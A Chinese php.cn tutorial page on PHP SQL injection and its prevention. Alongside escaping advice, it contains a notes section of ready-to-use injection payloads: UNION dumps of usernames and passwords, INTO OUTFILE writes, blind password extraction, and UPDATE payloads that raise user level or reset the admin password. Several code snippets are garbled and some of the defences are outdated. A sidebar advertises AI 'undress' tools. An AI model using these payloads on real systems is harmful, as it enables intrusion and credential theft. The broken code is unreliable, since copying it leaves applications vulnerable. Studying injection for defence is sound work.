首頁 後端開發 php教程 php sql注入攻擊與防範注意事項

php sql注入攻擊與防範注意事項

Jul 25, 2016 am 08:52 AM

  1. // supposed input
  2. $name = "ilia'; DELETE FROM users;";
  3. mysql_query("SELECT * FROM users;";
mysql_query("SELECT * FROM users) WHERE nameus' $name}'");
複製程式碼

很明顯最後資料庫執行的指令是:
SELECT * FROM users WHERE name=ilia; DELETE FROM users
複製代碼
這就為資料庫帶來了災難性的後果–所有記錄都被刪除了。

不過如果使用的資料庫是MySQL,那麼還好,mysql_query()函數不允許直接執行這樣的操作(不能單行進行多個語句操作),所以你可以放心。 如果使用的資料庫是SQLite或PostgreSQL,支援這樣的語句,那麼就將面臨滅頂之災了。

上面提到,SQL注入主要是提交不安全的資料給資料庫來達到攻擊目的。為了防止SQL注入攻擊,PHP自帶一個功能可以對輸入的字串進行處理,可以在較底層對輸入進行安全上的初步處理,也即Magic Quotes。 (php.ini magic_quotes_gpc)。如果magic_quotes_gpc選項啟用,那麼輸入的字串中的單引號,雙引號和其它一些字元前將會被自動加上反斜線。

但Magic Quotes並不是一個很通用的解決方案,沒能屏蔽所有有潛在危險的字符,並且在許多伺服器上Magic Quotes並沒有被啟用。所以,我們還需要使用其它多種方法來防止SQL注入。

許多資料庫本身就提供這種輸入資料處理功能。例如PHP的MySQL操作函數中有一個叫做mysql_real_escape_string()的函數,可將特殊字元和可能造成資料庫操作出錯的字元轉義。 這段程式碼:

  1. //如果Magic Quotes功用啟用

  2. if (get_magic_quotes_gpc()) {
  3. name);
  4. }else{
  5. $name = mysql_real_escape_string($name);
  6. }
  7. mysql_query("SELECT * FROM users WHERE name='{$name} '");

複製程式碼
注意,在使用資料庫所帶的功能之前要判斷Magic Quotes是否打開,就像上例一樣,否則兩次重複處理就會出錯。 如果MQ已啟用,要把加上的去掉才得到真實資料。

除了對以上字串形式的資料進行預處理之外,儲存Binary資料到資料庫時,也要注意進行預處理。否則資料可能與資料庫本身的儲存格式相衝突,造成資料庫崩潰,資料記錄遺失,甚至遺失整個庫的資料。有些資料庫如 PostgreSQL,提供一個專門用來編碼二進位資料的函數pg_escape_bytea(),它可以對資料進行類似Base64那樣的編碼。

例如:

  1. // for plain-text data use:

  2. pg_escape_string($regular_strings);
  3. pg_escape_string($regular_strings);
  4. // for binary data use:
  5. pg_escape_bytea($binary_data);
複製程式碼

另一種情況下,也要採用這樣的機制。 那就是資料庫系統本身不支援的多字節語言如中文,日文等。 其中有些的ASCII範圍和二進位資料的範圍重疊。

這裡推薦兩篇關於php sql注入防範的文章,一是360安全提供的,另一個筆者收集的php防sql注入的程式碼,很強大很好用。
  • php防SQL注入程式碼(360提供)
  • php防止sql注入漏洞過濾函數的程式碼

不過對資料進行編碼將有可能導致像LIKE abc% 這樣的查詢語句失效。

php sql注入實作(測試程式碼安全不錯)

SQL注入的重點就是建構SQL語句,只有彈性的運用SQL 語句才能建構出牛比的注入字串。學完之後寫了點筆記,已備隨時使用。希望你在看下面內容時先了 解SQL的基本原理。筆記中的程式碼來自網路。 ===基礎部分=== 本表查詢: http://127.0.0.1/injection/user.php?username=angel' and LENGTH(password)='6 http://127.0.0.1/injection/user.php?username=angel' and LEFT(password,1)='m

Union聯合語句: http://127.0.0.1/injection/show.php?id=1' union select 1,username,password from user/* http://127.0.0.1/injection/show.php?id=' union select 1,username,password from user/*

匯出檔案: http://127.0.0.1/injection/user.php?username=angel' into outfile 'c:/file.txt http://127.0.0.1/injection/user.php?username=' 或 1=1 into outfile 'c:/file.txt http://127.0.0.1/injection/show.php?id=' union select 1,username,password from user into outfile 'c:/user.txt

INSERT語句: INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', '$username', '$password', '$homepage', '1'); 建構homepage值為:http://jbxue.com', '3')# SQL語句變成:INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', 'angel', 'mypass', 'http://jbxue.com', '3')#' , '1');

UPDATE語句:我喜歡這樣東西 先理解這句SQL

  1. UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='$id'
複製程式碼

如果此SQL被修改成以下形式,就實現了注入 1:修改homepage值為 http://jbxue.com', userlevel='3 之後SQL語句變為
UPDATE user SET password='mypass', homepage='http://jbxue.com', userlevel='3' WHERE id='$id '
複製代碼

userlevel為使用者級別 2:修改password值為
mypass)' WHERE username='admin'#
複製代碼

之後SQL語句變為
UPDATE user SET password='MD5(mypass)' WHERE username='admin'#)', homepage='$homepage' WHERE id='$ id'
複製程式碼

3:修改id值為 ' OR username='admin' 之後SQL語句變為
UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='' OR username='admin'
複製程式碼

===高階部分=== 常用的MySQL內建函數 DATABASE() USER() SYSTEM_USER() SESSION_USER() CURRENT_USER() database() version() SUBSTRING() MID() char() load_file() …… 函數應用 UPDATE article SET title=DATABASE() WHERE id=1 http://127.0.0.1/injection/show.php?id=-1 union select 1,database(),version()
SELECT * FROM user WHERE username=char(97,110,103,101,108) # char(97,110,1037,10,1037,10,1037,110,1037,110,1033)> 🎜 >
複製程式碼

http://127.0.0.1/injection/user.php?userid=1 and password=char(109,121,112,97,115,115)http://127.0.0.1/injection/user.php?userid=1 and LEFT(password ,1)>char(100) http://127.0.0.1/injection/user.php?userid=1 and ord(mid(password,3,1))>111

確定資料結構的字段數量及類型 http://127.0.0.1/injection/show.php?id=-1 union select 1,1,1 http://127.0.0.1/injection/show.php?id=-1 union select char(97),char(97),char(97)

猜資料表名 http://127.0.0.1/injection/show.php?id=-1 union select 1,1,1 from members

跨表格查詢得到使用者名稱和密碼 http://127.0.0.1/ymdown/show.php?id=10000 union select 1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1 ,1,1,1 from ymdown_user where id=1

其他 #驗證第一位密碼 http://127.0.0.1/ymdown/show.php?id=10 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 ,1,1,1 from ymdown_user where id=1 and ord(mid(password,1,1))=49

===注入防範=== 伺服器方面 magic_quotes_gpc設定為On display_errors設定為Off 編碼方面

  1. $keywords = addslashes($keywords);
  2. $keywords = str_replace("_","_",$keywords);
  3. $keywords = str_replace("%","%",$keywords);
複製程式碼

數值型別 使用intval()抓換 字串類型 SQL語句參數中要新增單引號 下面程式碼,用於防治注入

  1. if (get_magic_quotes_gpc()) {
  2. //....
  3. }else{
  4. $str = mysql_real_estring($str. );
  5. $keywords = str_replace("_","_",$keywords);
  6. $keywords = str_replace("%","%",$keywords);
  7. }
複製程式碼

有用的函數 stripslashes() get_magic_quotes_gpc() mysql_real_escape_string() strip_tags() array_map() addslashes()



本網站聲明
本文內容由網友自願投稿,版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容,請聯絡admin@php.cn

熱AI工具

Undresser.AI Undress

Undresser.AI Undress

人工智慧驅動的應用程序,用於創建逼真的裸體照片

AI Clothes Remover

AI Clothes Remover

用於從照片中去除衣服的線上人工智慧工具。

Undress AI Tool

Undress AI Tool

免費脫衣圖片

Clothoff.io

Clothoff.io

AI脫衣器

Video Face Swap

Video Face Swap

使用我們完全免費的人工智慧換臉工具,輕鬆在任何影片中換臉!

熱工具

記事本++7.3.1

記事本++7.3.1

好用且免費的程式碼編輯器

SublimeText3漢化版

SublimeText3漢化版

中文版,非常好用

禪工作室 13.0.1

禪工作室 13.0.1

強大的PHP整合開發環境

Dreamweaver CS6

Dreamweaver CS6

視覺化網頁開發工具

SublimeText3 Mac版

SublimeText3 Mac版

神級程式碼編輯軟體(SublimeText3)

在PHP API中說明JSON Web令牌(JWT)及其用例。 在PHP API中說明JSON Web令牌(JWT)及其用例。 Apr 05, 2025 am 12:04 AM

JWT是一種基於JSON的開放標準,用於在各方之間安全地傳輸信息,主要用於身份驗證和信息交換。 1.JWT由Header、Payload和Signature三部分組成。 2.JWT的工作原理包括生成JWT、驗證JWT和解析Payload三個步驟。 3.在PHP中使用JWT進行身份驗證時,可以生成和驗證JWT,並在高級用法中包含用戶角色和權限信息。 4.常見錯誤包括簽名驗證失敗、令牌過期和Payload過大,調試技巧包括使用調試工具和日誌記錄。 5.性能優化和最佳實踐包括使用合適的簽名算法、合理設置有效期、

會話如何劫持工作,如何在PHP中減輕它? 會話如何劫持工作,如何在PHP中減輕它? Apr 06, 2025 am 12:02 AM

會話劫持可以通過以下步驟實現:1.獲取會話ID,2.使用會話ID,3.保持會話活躍。在PHP中防範會話劫持的方法包括:1.使用session_regenerate_id()函數重新生成會話ID,2.通過數據庫存儲會話數據,3.確保所有會話數據通過HTTPS傳輸。

PHP 8.1中的枚舉(枚舉)是什麼? PHP 8.1中的枚舉(枚舉)是什麼? Apr 03, 2025 am 12:05 AM

PHP8.1中的枚舉功能通過定義命名常量增強了代碼的清晰度和類型安全性。 1)枚舉可以是整數、字符串或對象,提高了代碼可讀性和類型安全性。 2)枚舉基於類,支持面向對象特性,如遍歷和反射。 3)枚舉可用於比較和賦值,確保類型安全。 4)枚舉支持添加方法,實現複雜邏輯。 5)嚴格類型檢查和錯誤處理可避免常見錯誤。 6)枚舉減少魔法值,提升可維護性,但需注意性能優化。

描述紮實的原則及其如何應用於PHP的開發。 描述紮實的原則及其如何應用於PHP的開發。 Apr 03, 2025 am 12:04 AM

SOLID原則在PHP開發中的應用包括:1.單一職責原則(SRP):每個類只負責一個功能。 2.開閉原則(OCP):通過擴展而非修改實現變化。 3.里氏替換原則(LSP):子類可替換基類而不影響程序正確性。 4.接口隔離原則(ISP):使用細粒度接口避免依賴不使用的方法。 5.依賴倒置原則(DIP):高低層次模塊都依賴於抽象,通過依賴注入實現。

在PHPStorm中如何進行CLI模式的調試? 在PHPStorm中如何進行CLI模式的調試? Apr 01, 2025 pm 02:57 PM

在PHPStorm中如何進行CLI模式的調試?在使用PHPStorm進行開發時,有時我們需要在命令行界面(CLI)模式下調試PHP�...

如何用PHP的cURL庫發送包含JSON數據的POST請求? 如何用PHP的cURL庫發送包含JSON數據的POST請求? Apr 01, 2025 pm 03:12 PM

使用PHP的cURL庫發送JSON數據在PHP開發中,經常需要與外部API進行交互,其中一種常見的方式是使用cURL庫發送POST�...

如何在系統重啟後自動設置unixsocket的權限? 如何在系統重啟後自動設置unixsocket的權限? Mar 31, 2025 pm 11:54 PM

如何在系統重啟後自動設置unixsocket的權限每次系統重啟後,我們都需要執行以下命令來修改unixsocket的權限:sudo...

See all articles